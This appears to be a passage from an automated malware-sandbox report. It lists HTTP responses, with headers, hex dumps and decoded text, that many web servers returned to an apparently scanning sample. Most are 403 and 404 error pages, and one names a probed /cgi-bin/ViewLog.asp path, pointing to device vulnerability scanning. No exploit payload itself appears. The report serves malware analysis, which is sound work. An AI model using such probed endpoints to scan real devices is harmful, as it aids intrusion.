6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 31 32 37 2e 30 2e 30 2e 31 3c
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 08:58:54 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 38 3a 35 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:58:54 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 10:58:53 GMTServer: App-webs/Content-Length: 195Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 18 Mar 2024 08:57:07 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 11:59:43 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 89Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 01 Jan 1970 13:30:26 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:58 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:00 GMTServer: Apache/2.4.38 (Debian)X-Powered-By: PHP/7.3.12Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://caulo366.info/wp-json/>; rel="https://api.w.org/"Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 35 37 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 76 69 2d 56 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 61 75 6c 6f 33 36 36 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 0d 0a 3c 74 69 74 6c 65 3e 4b 68 c3 b4 6e 67 20 74 c3 ac 6d 20 74 68 e1 ba a5 79 20 74 72 61 6e 67 20 6e c3 a0 79 20 26 23 38 32 31 31 3b 20 53 4f 49 20 43 e1 ba a6 55 20 e2 80 93 20 33 20 43 c3 80 4e 47 20 e2 80 93 20 43 e1 ba a6 55 20 56 49 50 20 e2 80 93 20 43 e1 bb b0 43 20 43 48 55 e1 ba a8 4e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 61 75 6c 6f 33 36 36 2e 69 6e 66 6f 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 c3 b2 6e 67 20 74 68 c3 b4 6e 67 20 74 69 6e 20 53 4f 49 20 43 e1 ba a6 55 20 e2 80 93 20 33 20 43 c3 80 4e 47 20 e2 80 93 20 43 e1 ba a6 55 20 56 49 50 20 e2 80 93 20 43 e1 bb b0 43 20 43 48 55 e1 ba a8 4e 20 26 72 61 71 75 6f 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 61 75 6c 6f 33 36 36 2e 69 6e 66 6f 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 44 c3 b2 6e 67 20 70 68 e1 ba a3 6e 20 68 e1 bb 93 69 20 53 4f 49 20 43 e1 ba a6 55 20 e2 80 93 20 33 20 43 c3 80 4e 47 20 e2 80 93 20 43 e1 ba a6 55 20 56 49 50 20 e2 80 93 20 43 e1 bb b0 43 20 43 48 55 e1 ba a8 4e 20 26 72 61 71 75 6f 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 61 75 6c 6f 33 36 36 2e 69 6e 66 6f 2f 63 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 18 Mar 2024 08:59:00 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 89Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:59:05 GMTContent-Length: 103Data Raw: 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:59:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:05 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 39 3a 30 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 